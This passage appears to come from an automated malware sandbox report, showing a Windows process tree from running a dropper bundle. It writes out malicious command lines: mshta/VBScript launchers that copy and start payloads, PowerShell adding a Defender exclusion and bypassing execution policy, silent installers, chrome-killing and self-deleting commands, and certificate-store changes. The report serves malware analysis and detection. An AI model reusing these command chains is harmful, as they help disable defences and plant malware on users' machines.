                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5288
                                                                            • C:\Users\Admin\AppData\Roaming\8214917.exe
                                                                              "C:\Users\Admin\AppData\Roaming\8214917.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: SetClipboardViewer
                                                                              PID:768
                                                                            • C:\Users\Admin\AppData\Roaming\3756584.exe
                                                                              "C:\Users\Admin\AppData\Roaming\3756584.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:5788
                                                                            • C:\Users\Admin\AppData\Roaming\8328281.exe
                                                                              "C:\Users\Admin\AppData\Roaming\8328281.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:5876
                                                                            • C:\Users\Admin\AppData\Roaming\7909570.exe
                                                                              "C:\Users\Admin\AppData\Roaming\7909570.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4420
                                                                            • C:\Users\Admin\AppData\Roaming\5231114.exe
                                                                              "C:\Users\Admin\AppData\Roaming\5231114.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4736
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:5344
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1252
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5392
                                                                            • C:\Users\Admin\AppData\Local\Temp\tmp67F_tmp.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\tmp67F_tmp.exe"
                                                                              6⤵
                                                                                PID:5292
                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                  "C:\Windows\System32\dllhost.exe"
                                                                                  7⤵
                                                                                    PID:6644
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                    7⤵
                                                                                      PID:6740
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd
                                                                                        8⤵
                                                                                          PID:740
                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                            findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                            9⤵
                                                                                              PID:8032
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                              Esplorarne.exe.com i
                                                                                              9⤵
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:5480
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                10⤵
                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                PID:4812
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                  11⤵
                                                                                                  • Drops startup file
                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                  PID:7072
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping GFBFPSXA -n 30
                                                                                              9⤵
                                                                                              • Runs ping.exe
                                                                                              PID:5444
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                      5⤵
                                                                                        PID:5476
                                                                                        • C:\Users\Admin\Documents\56VmE9iCvp0_IImADesPFB_o.exe
                                                                                          "C:\Users\Admin\Documents\56VmE9iCvp0_IImADesPFB_o.exe"
                                                                                          6⤵
                                                                                            PID:4992
                                                                                          • C:\Users\Admin\Documents\RKzYWfoDpJgniRvh9MUp5Qpe.exe
                                                                                            "C:\Users\Admin\Documents\RKzYWfoDpJgniRvh9MUp5Qpe.exe"
                                                                                            6⤵
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            PID:6208
                                                                                          • C:\Users\Admin\Documents\XOpuU1i1eOLrubfJTdC9HqRT.exe
                                                                                            "C:\Users\Admin\Documents\XOpuU1i1eOLrubfJTdC9HqRT.exe"
                                                                                            6⤵
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            PID:6200
                                                                                          • C:\Users\Admin\Documents\UcK8hgCxfZ4jk3ktnUqw4uLO.exe
                                                                                            "C:\Users\Admin\Documents\UcK8hgCxfZ4jk3ktnUqw4uLO.exe"
                                                                                            6⤵
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            PID:6256
                                                                                          • C:\Users\Admin\Documents\Wc_WTxjviBEjS3FUd7WSHCYr.exe
                                                                                            "C:\Users\Admin\Documents\Wc_WTxjviBEjS3FUd7WSHCYr.exe"
                                                                                            6⤵
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:6308
                                                                                            • C:\Users\Admin\Documents\Wc_WTxjviBEjS3FUd7WSHCYr.exe
                                                                                              "C:\Users\Admin\Documents\Wc_WTxjviBEjS3FUd7WSHCYr.exe"
                                                                                              7⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:8904
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\Wc_WTxjviBEjS3FUd7WSHCYr.exe"
                                                                                                8⤵
                                                                                                  PID:1996
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    9⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    PID:4520
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /T 10 /NOBREAK
                                                                                                    9⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:8328
                                                                                            • C:\Users\Admin\Documents\YmhuYVOH8358Fmxy2ug4gznB.exe
                                                                                              "C:\Users\Admin\Documents\YmhuYVOH8358Fmxy2ug4gznB.exe"
                                                                                              6⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:6268
                                                                                              • C:\Users\Admin\Documents\YmhuYVOH8358Fmxy2ug4gznB.exe
                                                                                                C:\Users\Admin\Documents\YmhuYVOH8358Fmxy2ug4gznB.exe
                                                                                                7⤵
                                                                                                  PID:6240
                                                                                              • C:\Users\Admin\Documents\8LxmG5gtWoSFVR2yYq5NHaoL.exe
                                                                                                "C:\Users\Admin\Documents\8LxmG5gtWoSFVR2yYq5NHaoL.exe"
                                                                                                6⤵
                                                                                                • Drops file in Program Files directory
                                                                                                PID:6192
                                                                                              • C:\Users\Admin\Documents\fik4lPMulpZL3ppc_Bb9K1bi.exe
                                                                                                "C:\Users\Admin\Documents\fik4lPMulpZL3ppc_Bb9K1bi.exe"
                                                                                                6⤵
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:4848
                                                                                              • C:\Users\Admin\Documents\En7wPOKfLlnM1dITJUfwjQ0h.exe
                                                                                                "C:\Users\Admin\Documents\En7wPOKfLlnM1dITJUfwjQ0h.exe"
                                                                                                6⤵
                                                                                                  PID:5848
                                                                                                • C:\Users\Admin\Documents\uW5ZJqvSVVkNFrafWBNpCiEy.exe
                                                                                                  "C:\Users\Admin\Documents\uW5ZJqvSVVkNFrafWBNpCiEy.exe"
                                                                                                  6⤵
                                                                                                    PID:6768
                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                      "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\uW5ZJqvSVVkNFrafWBNpCiEy.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\uW5ZJqvSVVkNFrafWBNpCiEy.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                      7⤵
                                                                                                        PID:7092
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\uW5ZJqvSVVkNFrafWBNpCiEy.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\uW5ZJqvSVVkNFrafWBNpCiEy.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                          8⤵
                                                                                                            PID:5260
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                              hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                              9⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5632
                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                10⤵
                                                                                                                  PID:4948
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                    11⤵
                                                                                                                      PID:6808
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                    10⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:8160
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill -f -iM "uW5ZJqvSVVkNFrafWBNpCiEy.exe"
                                                                                                                  9⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:7284
                                                                                                          • C:\Users\Admin\Documents\J6Ns0Fr5LLzrRsjYVtvnKgpb.exe
                                                                                                            "C:\Users\Admin\Documents\J6Ns0Fr5LLzrRsjYVtvnKgpb.exe"
                                                                                                            6⤵
                                                                                                              PID:6964
                                                                                                              • C:\Users\Admin\Documents\J6Ns0Fr5LLzrRsjYVtvnKgpb.exe
                                                                                                                "C:\Users\Admin\Documents\J6Ns0Fr5LLzrRsjYVtvnKgpb.exe"
                                                                                                                7⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:7088
                                                                                                            • C:\Users\Admin\Documents\IDu8iIKz6oIRXefq74seNgeQ.exe
                                                                                                              "C:\Users\Admin\Documents\IDu8iIKz6oIRXefq74seNgeQ.exe"
                                                                                                              6⤵
                                                                                                                PID:7120
                                                                                                                • C:\Users\Admin\Documents\IDu8iIKz6oIRXefq74seNgeQ.exe
                                                                                                                  "C:\Users\Admin\Documents\IDu8iIKz6oIRXefq74seNgeQ.exe" -q
                                                                                                                  7⤵
                                                                                                                    PID:5172
                                                                                                                • C:\Users\Admin\Documents\FhfHMIBrkwna9J8WLgFWou70.exe
                                                                                                                  "C:\Users\Admin\Documents\FhfHMIBrkwna9J8WLgFWou70.exe"
                                                                                                                  6⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:6996
                                                                                                                  • C:\Users\Admin\Documents\FhfHMIBrkwna9J8WLgFWou70.exe
                                                                                                                    "C:\Users\Admin\Documents\FhfHMIBrkwna9J8WLgFWou70.exe"
                                                                                                                    7⤵
                                                                                                                      PID:4808
                                                                                                                  • C:\Users\Admin\Documents\5Hna83hdJis49P_JpmnSNkwf.exe
                                                                                                                    "C:\Users\Admin\Documents\5Hna83hdJis49P_JpmnSNkwf.exe"
                                                                                                                    6⤵
                                                                                                                      PID:6324
                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\5HNA83~1.DLL,s C:\Users\Admin\DOCUME~1\5HNA83~1.EXE
                                                                                                                        7⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        PID:6068
                                                                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\5HNA83~1.DLL,PS0QcTYz
                                                                                                                          8⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Modifies system certificate store
                                                                                                                          PID:7540
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\5HNA83~1.DLL
                                                                                                                            9⤵
                                                                                                                              PID:4000
                                                                                                                            • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                              C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\5HNA83~1.DLL,bAtg
                                                                                                                              9⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Checks processor information in registry
                                                                                                                              PID:9028
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                                                                                                                10⤵
                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                PID:8512
                                                                                                                                • C:\Windows\system32\ctfmon.exe
                                                                                                                                  ctfmon.exe
                                                                                                                                  11⤵
                                                                                                                                    PID:1056
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp76FD.tmp.ps1"
                                                                                                                                9⤵
                                                                                                                                  PID:8420
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp3FBB.tmp.ps1"
                                                                                                                                  9⤵
                                                                                                                                    PID:6428
                                                                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                      "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                                                                                                      10⤵
                                                                                                                                        PID:9316
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                      9⤵
                                                                                                                                        PID:5332
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                        9⤵
                                                                                                                                          PID:9492
                                                                                                                                  • C:\Users\Admin\Documents\VnTjR5uW5GLAXUGEu3Gw39F_.exe
                                                                                                                                    "C:\Users\Admin\Documents\VnTjR5uW5GLAXUGEu3Gw39F_.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:4152
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-CVIAU.tmp\VnTjR5uW5GLAXUGEu3Gw39F_.tmp
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-CVIAU.tmp\VnTjR5uW5GLAXUGEu3Gw39F_.tmp" /SL5="$301E2,138429,56832,C:\Users\Admin\Documents\VnTjR5uW5GLAXUGEu3Gw39F_.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:4520
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-DPEJI.tmp\Setup.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-DPEJI.tmp\Setup.exe" /Verysilent
                                                                                                                                            8⤵
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            PID:4912
                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                              9⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              PID:6456
                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629387666 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                10⤵
                                                                                                                                                  PID:180
                                                                                                                                        • C:\Users\Admin\Documents\P9TZ35AjDF87FNOeHFFcXyc7.exe
                                                                                                                                          "C:\Users\Admin\Documents\P9TZ35AjDF87FNOeHFFcXyc7.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:6896
                                                                                                                                          • C:\Users\Admin\Documents\P9TZ35AjDF87FNOeHFFcXyc7.exe
                                                                                                                                            C:\Users\Admin\Documents\P9TZ35AjDF87FNOeHFFcXyc7.exe
                                                                                                                                            7⤵
                                                                                                                                              PID:4204
                                                                                                                                          • C:\Users\Admin\Documents\vkEp_KEmFAlzLLrohAfxfHFy.exe
                                                                                                                                            "C:\Users\Admin\Documents\vkEp_KEmFAlzLLrohAfxfHFy.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:5352
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1819166.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1819166.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                PID:7528
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\5108317.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\5108317.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:7556
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5273885.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5273885.exe"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:6288
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4078912.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4078912.exe"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:7252
                                                                                                                                                  • C:\Users\Admin\Documents\jaUAVGi9QtHwxWrZtG2KXoXN.exe
                                                                                                                                                    "C:\Users\Admin\Documents\jaUAVGi9QtHwxWrZtG2KXoXN.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:6580
                                                                                                                                                    • C:\Users\Admin\Documents\FAS7KHfFQtelAcBAuTSeemeK.exe
                                                                                                                                                      "C:\Users\Admin\Documents\FAS7KHfFQtelAcBAuTSeemeK.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:6876
                                                                                                                                                      • C:\Users\Admin\Documents\gIk0kHYALCuDqs3PF5_b8r8v.exe
                                                                                                                                                        "C:\Users\Admin\Documents\gIk0kHYALCuDqs3PF5_b8r8v.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:6832
                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:5148
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                          6⤵
                                                                                                                                                            PID:5208
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                              7⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5140
                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4564
                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5020
                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:492
                                                                                                                                                  • C:\Users\Admin\Documents\WvCR6H5K9X1zZQw7kQezbDmJ.exe
                                                                                                                                                    "C:\Users\Admin\Documents\WvCR6H5K9X1zZQw7kQezbDmJ.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:1760
                                                                                                                                                  • C:\Users\Admin\Documents\jhmyI4EwlCrkyIkx9rH5qoSX.exe
                                                                                                                                                    "C:\Users\Admin\Documents\jhmyI4EwlCrkyIkx9rH5qoSX.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:1388
                                                                                                                                                    • C:\Users\Admin\Documents\jhmyI4EwlCrkyIkx9rH5qoSX.exe
                                                                                                                                                      "C:\Users\Admin\Documents\jhmyI4EwlCrkyIkx9rH5qoSX.exe" -q
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4688
                                                                                                                                                  • C:\Users\Admin\Documents\7GRgDIlkaSeGK4lbjICjuNaQ.exe
                                                                                                                                                    "C:\Users\Admin\Documents\7GRgDIlkaSeGK4lbjICjuNaQ.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:1164
                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                      "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\7GRgDIlkaSeGK4lbjICjuNaQ.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\7GRgDIlkaSeGK4lbjICjuNaQ.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4316
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\7GRgDIlkaSeGK4lbjICjuNaQ.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\7GRgDIlkaSeGK4lbjICjuNaQ.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4716
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                                                              hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:808
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:4492
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:4844
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:4016
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill -f -iM "7GRgDIlkaSeGK4lbjICjuNaQ.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:4744
                                                                                                                                                          • C:\Users\Admin\Documents\pPmbJp5w524tYTNLB9DgedSD.exe
                                                                                                                                                            "C:\Users\Admin\Documents\pPmbJp5w524tYTNLB9DgedSD.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:1000
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1000 -s 896
                                                                                                                                                              3⤵
                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                              • Program crash
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5636
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0GBKA.tmp\VPN.tmp
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-0GBKA.tmp\VPN.tmp" /SL5="$10392,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          PID:5316
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-7T6MR.tmp\Setup.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-7T6MR.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                            2⤵
                                                                                                                                                              PID:7060
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-RMEK0.tmp\Setup.tmp
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-RMEK0.tmp\Setup.tmp" /SL5="$10572,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-7T6MR.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                3⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                • Suspicious use of FindShellTrayWindow
